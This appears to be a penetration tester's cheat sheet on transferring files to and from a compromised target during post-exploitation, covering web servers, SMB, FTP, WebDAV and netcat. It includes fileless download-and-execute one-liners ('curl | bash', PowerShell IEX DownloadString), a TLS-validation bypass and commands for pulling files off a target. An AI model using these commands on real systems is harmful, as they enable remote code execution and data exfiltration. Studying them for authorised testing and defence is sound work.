Transfer files π
We will often want to transfer files between your machine, and the target. Mostly during privilege escalation and post-exploitation.
According to the current environment capabilities (e.g., installed tools) and restrictions (e.g. firewall), we will have to use different techniques.
The most common approaches from the host to the target:
- Copy-pasting (short text files) βοΈ
- Python web server (using wget/cURL/iwr as client) π
π There are also fileless techniques to avoid storing the file on the target, such as curl xxx | bash or other similar tricks.
To transfer a file from the target to the host, it's often harder and more complex. Some common approaches are:
- Copy-pasting (short text files) βοΈ
- Moving files to the webserver directory (if applicable) π
- Python web server (often available on Linux) π
- Using services such as SCP/FTP/SMB/NFS/... (if present) π‘
- Using installed tools such as nc, php, etc. π§―
We may use checksum functions/commands to check that the file was correctly transferred. Refer to cryptography/hashing/checksum.
Sending a file to others π
On the "host" where the file is:
Python webserver π
Start a webserver allowing clients to download the files. You may try with python2, and python3 if python is unavailable.
$ python2.7 -m SimpleHTTPServer
$ python -m http.server port # port > 1023 | expose pwd
$ python [...] --directory /path/to/server/root
$ sudo python -m http.server port # port <= 1023
Upload To SMB Share
You can use copy to upload a file to a client SMB share:
PS> copy file.txt \\HOST_IP\share_name\path
PS> robocopy file.txt \\HOST_IP\share_name\path
If guest access is not allowed, try mounting the share.
Upload To FTP Server
You can use the URL ftp://HOST_IP/<target_file_name> with a HTTP upload tool or the FTP PowerShell client:
PS> (New-Object Net.WebClient).UploadFile('ftp://X/abc', 'C:\path\to\abc')
PS> ftp -v -n
ftp> open IP
ftp> USER anonymous
password: <blank>
ftp> dir # list files
ftp> put <file>
ftp> bye
Other webservers π‘
You may leverage an installed web development tool/package to start a webserver allowing clients to download files:
$ php -S 127.0.0.1:8080 # php
$ http-server -p 8080 # node "http-server" package
$ ruby -run -ehttpd . -p8080
Receiving/Fetching a file π
On the "client" that need the file:
Using Common Utilities
The wget command is available on both Linux and Windows.
$ # Download on Linux
$ wget HOST_IP:port/script.sh -o /tmp/script.sh
PS> # Download on Windows
PS> wget HOST_IP:port/script.ps1 -o $Env:TMP/script.ps1
You may have to use curl or iws (Windows-only) instead of wget.
$ curl HOST_IP:port/script.sh -o /tmp/script.sh
PS> curl HOST_IP:port/script.ps1 -o $Env:TMP/script.ps1
PS> iws HOST_IP:port/script.ps1 -o $Env:TMP/script.ps1
Host A Simple Upload Server
Run a webserver with an upload file form, such as the one below:
$ sudo pip3 install uploadserver
$ python3 -m uploadserver
$ python3 -m uploadserver 443 --server-certificate cert.pem
And make the client use it to upload the file.
Download From SMB Share
You can use copy to download a file from a share:
PS> copy \\HOST_IP\share_name\file_path
PS> robocopy \\HOST_IP\share_name\file_path .
If guest access is not allowed, try mounting the share.
Download From FTP Server
You can use the URL ftp://HOST_IP/<file_name> with a HTTP client such as wget or the FTP PowerShell client:
PS> ftp -v -n
ftp> open IP
ftp> USER anonymous
password: <blank>
ftp> dir # list files
ftp> get <file>
ftp> bye
Window Utilities
A few windows commands/tools we can use:
PS> # all are said to be faster than iwr/curl/wget
PS> (New-Object Net.WebClient).DownloadFile('URL','OUTPUT')
PS> (New-Object Net.WebClient).DownloadFileAsync('URL','OUTPUT')
PS> IEX (New-Object Net.WebClient).DownloadString('URL')
β‘οΈ See also: DownloadCradles.ps1 (0.3k β). Add the -UseBasicParsing in case of IE errors. To disable SSL/TLS:
PS> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Additional Elements
services π³οΈ
You may use FTP/SCP/NFS/SMB/... if applicable.
- Simple SMB Server (Linux Host)
- Simple FTP Server (Linux Host)
An alternative to SMB that uses HTTP is WebDav.
$ sudo apt install python3-wsgidav
$ wsgidav --host=0.0.0.0 --port=8080 --root=/tmp/smbshare --auth=anonymous
PS> iwr -Uri "http:/IP:8080/<file>"
PS> copy \\IP\DavWWWRoot\<file> # π» // didn't work
We may be able to mount a drive using RDP. On Windows, in the options of the RDP client, we can configure the mapping too.
$ rdesktop [...] -r disk:linux='/path/to/folder'
$ xfreerdp [...] /drive:linux,/path/to/folder
netcat π
# host
$ nc CLIENT_IP port < file.sh
# client
$ nc -lvp port > file.sh
$ # --recv-only | -q 0 | --send-only
Copy-paste βοΈ
Copy-paste may be an option, but not every file can be copy-pasted. One trick is to encode the file using base64, copy-paste the base64 payload on a file on the target, and decode the file on the target.
Fileless payloads π»
On Linux, we often use a pipe (|):
$ curl [...] | bash
$ wget -qO- [...] | bash
$ [...] | python3
On Windows, we often use:
PS> IEX [...]
PS> [...] | IEX
π» To-do π»
Stuff that I found, but never read/used yet.
- Windows File Transfer Cheatsheet
- croc
- PSUpload
-
/dev/TCP - can use cURL to upload files
- can use openssl like nc
$ openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < file
$ openssl s_client -connect IP -quiet > file